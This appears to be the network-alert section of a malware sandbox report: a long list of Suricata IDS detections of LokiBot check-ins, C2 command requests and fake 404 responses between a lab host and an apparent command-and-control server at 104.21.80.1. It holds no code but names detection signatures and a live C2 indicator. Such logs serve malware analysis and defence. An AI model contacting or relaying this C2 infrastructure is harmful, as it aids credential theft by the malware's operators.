Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49717 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49717 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49886 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49886 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49873
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49966 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49966 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49966 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49966 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49966 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49900
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49832 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49717 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49717 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49993 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49993 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49993 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49981 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49966
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49860 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49993 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49993 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49832 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49832 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50004 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50004 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50004 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49860 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49832 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50004 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49832 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50004 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49860 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49860 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49860 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50004
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50016 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50016 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50016 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50011
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50019 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50016 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50016 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50014
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50009 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50009 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50009 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50023 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50009 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50009 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49886
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50034 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50024 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50019
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50024 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50008 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50013
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50031
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49912
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50037
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50015 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49951
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50029
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50039
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50017
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50024
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50015
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50028
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50032
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50030
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49832
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49741 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49741 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49741 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49741 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:49938
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50038 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49741 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50009
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.5:50033
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 104.21.80.1:80
